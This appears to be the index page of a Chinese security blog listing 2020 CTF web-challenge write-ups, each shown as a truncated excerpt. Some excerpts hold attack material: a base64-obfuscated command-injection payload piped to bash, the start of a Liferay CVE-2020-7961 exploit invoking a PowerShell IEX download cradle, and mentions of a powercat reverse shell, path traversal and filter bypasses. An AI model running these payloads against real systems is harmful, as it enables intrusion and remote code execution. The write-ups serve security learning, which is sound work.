首届“祥云杯”网络安全大赛

2020-11-24 15:11:00 17
ctf - wp - 祥云杯

Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: 稍微加点空格什么的修修改改就行了,payload: ?url=|echo%09"Y2FcdCAvZXRjLy5maW5kZmxhZy8q"|base64%09-d|ba\s\h flaskbot 通过各种让他报错拿到一份大概的源码: 可以看到这里用了render_templ...

Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: ...

阅读全文>>

ciscn 2020 final web

2020-10-10 12:10:00 146
ctf - wp - ciscn

文章首发于:合天 web1 输入1点击输入框后会显示如下参数: ?id=1&limit=1 看下源码能得到这么两句sql语句: <!-- $query = "SELECT * FROM fake_flag WHERE id = $id limit 0,$limit"; //$query = "SELECT flag FROM real_flag WHERE id = $id ...

文章首发于:合天 web1 输入1点击输入框后会显示如下参数: ?id=1&limit=1 看下源码能得到...

阅读全文>>

ciscn2020初赛

2020-08-21 18:08:00 390
ctf - wp - ciscn

easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache $pid = pcntl_fork(); if ($pid == -1) { die('could not fork'); }else if ($pid){ $r=pcntl_wait($status); ...

easyphp 源码给出: ```php <?php //题目环境:php:7.4.8-apache...

阅读全文>>

DASCTF 七月

2020-07-26 01:07:00 265
wp - dasctf

好久没发文了,水水 web1 前缀固定,发现../被过滤了,但这道题只是过滤了开头的../,搞不明白这么出题有什么意思。。 ```python import time import requests import base64 file = "hhhm/../../../../../../../../flag" file = base64.b64encode(file.encode()) ...

好久没发文了,水水 web1 前缀固定,发现../被过滤了,但这道题只是过滤了开头的../,搞不明白这么出题有什么...

阅读全文>>

DozerCTF

2020-06-15 14:06:00 542
ctf - wp - DozerCTF

简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的cve:CVE-2020-7961 ```java public class Exploit { static { try { String[] cmd = {"cmd.exe", "/c", "powershell IEX (New-Object System.Net.Webc...

简单的域渗透1 一血,感觉是非预期?前面直接用powercat弹shell,后面怎么都弹不到了? Liferay的...

阅读全文>>

GKCTF2020

2020-05-25 22:05:00 335
ctf - wp - GKCTF

题目算是挺适合我的难度,后面还有一个反序列化题看着挺麻烦的就没搞,有空再复现了 CheckIN 直接给了一个eval: ```php <?php highlight_file(FILE); class ClassName { public $code = null; public $decode = null; function __c...

题目算是挺适合我的难度,后面还有一个反序列化题看着挺麻烦的就没搞,有空再复现了 CheckIN 直接给了一个eva...

阅读全文>>

网鼎杯 2020(青龙)

2020-05-12 19:05:00 373
ctf - wp - 网鼎

再次吐槽一个队伍只能开一个容器,大早上起来迟迟不放web题。 AreUSerialz 反序列化利用,给出源码: ```php <?php include("flag.php"); highlight_file(FILE); class FileHandler { protected $op; protected $filename; protected $content; funct...

再次吐槽一个队伍只能开一个容器,大早上起来迟迟不放web题。 AreUSerialz 反序列化利用,给出源码: `...

阅读全文>>

De1CTF 2020

2020-05-06 23:05:00 367
ctf - wp - De1CTF

题都挺难的,学到好多,下次一定(不会 Check In fuzz了一下,php不给过,可以.htaccess,因为php给ban了,后面Gq师傅说跟nuca2019一样直接用斜杆换行可以绕过,那么直接用auto_append_file包含一个文件,文件放base64,用伪协议解base64直接catflag。 AddType application/x-httpd-p\ hp .jpg p\...

题都挺难的,学到好多,下次一定(不会 Check In fuzz了一下,php不给过,可以.htaccess,因为...

阅读全文>>

安恒4月

2020-04-26 15:04:00 328
ctf - wp - 安恒

两个web只做出来一个。。 web1 一个反序列化题目,源码给出: ```php <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data) { ret...

两个web只做出来一个。。 web1 一个反序列化题目,源码给出: ```php <?php show_s...

阅读全文>>

HFCTF2020

2020-04-24 22:04:00 342
ctf - wp - hfctf

两个js题目,必须学习一波js了,老盯着php不放遇到了都不会 EasyLogin 这道题当时运气好撞了出来,因为第一次接触nodejs,所以做的有点坎坷。。 static/js/app.js下提示koa-static 读到controllers/api.js关键代码 ```js const crypto = require('crypto'); const fs = require('fs...

两个js题目,必须学习一波js了,老盯着php不放遇到了都不会 EasyLogin 这道题当时运气好撞了出来,因为...

阅读全文>>

BBCTF2020

2020-04-24 15:04:00 394
ctf - wp - bbctf

前几周的,高质量比赛,题目有点思路但做不出来,有空了复现一波 notebook 题目给了源码,根据server.py发现flag放在管理员的notebook中,然后还发现一行代码给了挺关键的提示 这道题思路很好,xss,然后站内又有一个表单可以填,那么应该是存在有绕过python-markdown2进行xss的payload作者才敢这么出题。 马后炮表示google一搜就有了。。 htt...

前几周的,高质量比赛,题目有点思路但做不出来,有空了复现一波 notebook 题目给了源码,根据server.p...

阅读全文>>

Hack Zone Tunisia 2020

2020-04-13 21:04:00 406
ctf - wp - HackZone

BabyWeb1 下面还有几张图片,点击图片会跳转到一个页面 但没有密码,点击submit按钮会给出另一个表单 尝试随便发送一张图片,他会给一个密码,然而当我们尝试已经存在的图片标题时,会在标题处报错,提示图片标题已存在,这里可以使用sql约束攻击。 https://www.freebuf.com/articles/web/124537.html 比较简单,直接使用空格绕过即可。 几...

BabyWeb1 下面还有几张图片,点击图片会跳转到一个页面 但没有密码,点击submit按钮会给出另一个表单...

阅读全文>>

TG:Hack2020

2020-04-13 21:04:00 307
ctf - wp - TG:Hack

Redux 题有点鸡贼,flag放在js文件里面。 Shop 这题也很鸡贼。。一个简单题把我难倒了。。 这有个借钱还钱的表单,若同时借钱还钱就会报错,原以为是要绕过这里。 这里一个买东西的 当我们尝试把价格调低时会被检测到: 而当我们把id号修改为不存在的货物时会被成功消费,因此把sum改为负数即可成功获得金钱。 TG20{I_just_want_to_buy_a_real_fla...

Redux 题有点鸡贼,flag放在js文件里面。 Shop 这题也很鸡贼。。一个简单题把我难倒了。。 这有个借...

阅读全文>>


CopyRight © 2019 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号